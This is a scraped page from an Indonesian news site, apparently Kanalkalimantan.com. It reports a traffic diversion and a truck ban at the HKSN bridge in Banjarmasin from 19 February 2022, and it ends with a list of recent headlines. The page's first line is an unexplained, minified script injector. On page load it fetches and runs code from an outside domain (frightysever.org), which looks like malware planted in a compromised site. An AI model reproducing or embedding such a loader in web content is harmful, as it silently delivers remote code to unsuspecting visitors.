(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Perubahan Arus Lalin di Jembatan HKSN Mulai 19 Februari, Truk Dilarang Melintas


KANALKALIMANTAN.COM, BANJARMASIN – Pembangunan jembatan HKSN terus bergulir. Dalam rangka percepatan pembangunan, pemasangan tiang pancang yang akan dilakukan pada sisi selatan struktur jembatan HKSN, rekayasa arus lalu lintas dipersiapkan.

Akibatnya pembuatan jalur alternatif baru akan dilakukan dan rencana pengalihan arus lalu lintas akan diberlakukan mulai Sabtu (19/2/2022) hingga 30 hari setelahnya.

Kasat Lantas Polresta Banjarmasin, Kompol M Noor Chaidir membeberkan, jalur alternatif yang direkomendasikan berupa pembuatan jalan baru di sisi kiri jembatan yang akan dilewati bagi pengendara roda dua dan mobil kecil yang melintas dari arah Kuin Selatan menuju Kuin Cerucuk maupun sebaliknya.

“Jalan dibelokan melintasi bawah jembatan. Artinya bukan dilakukan penutupan berskala besar, jalan tetap di arah yang sama, namun dibikinkan jalan di sebelahnya,” bebernya, kepada Kanalkalimantan.com, Rabu (16/2/2022).

 

Baca juga : Plt Bupati HSU Akhirnya Lantik 8 Kepala Dinas/Badan

Sedangkan untuk mobil berdimensi besar, seperti truk, truk tanki, bus serta angkutan berat lain dari arah Kuin Selatan tidak diiizinkan melintas di bawah jembatan untuk menuju Kuin Cerucuk.

Rekayasa arus lalin untuk angkutan berdimensi besar diarahkan melalui Jalan Belitung masuk Simpang Anem, begitu pula sebaliknya. Mengingat struktur dan kekuatan tanah jalan pengalihan tidak bisa menahan beban di atas 2 ton.

“Dari pihak kontraktor membuat jalan di sebelahnya, namun akan dilakukan pembatasan untuk angkutan, khusus truk, tronton, tanki dan bis yang tidak boleh melawati karena dikhawatirkan struktur jalannya tidak kuat dan amblas,” jelas Kasat Lantas Polresta Banjarmasin.

Demi menghindari kesalahan jalur oleh pengendara mobil berdimensi besar, Kasat mengatakan akan menempatkan personel untuk pengamanan.

 

Baca juga : Gubernur Kalsel 1985-1995 Ir HM Said Tutup Usia

“Dalam hal sosialiasi pihak kontraktor meminta kita membackup selama weekend dan hari biasa dengan pola pola kinerja jalan. Tugas kita di situ nanti memutar balik truk-truk yang mau melintas di situ,” ungkap Kasat.

Rencana pengalihan arus tersebut telah dikoordinasikan antara Satlantas Polresta Banjarmasin, Dinas Perhubungan Banjarmasin, Dinas PUPR Banjarmasin dan pihak kontraktor.

“Kita sosialisasikan dulu kepada masyarakat, dengan pengalihan arus sekitar 30 hari, itu berdasarkan lama pengerjaan pemancangannya, kemudian mengolah lantai dasar jembatan sampai pengaspalan, kalo cuaca nya mendukung juga maka jembatan bisa cepat selesai,” tutup Kasat.(kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Desy Arfianty

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

42 menit ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

1 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

1 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

2 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

2 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

3 jam ago

This website uses cookies.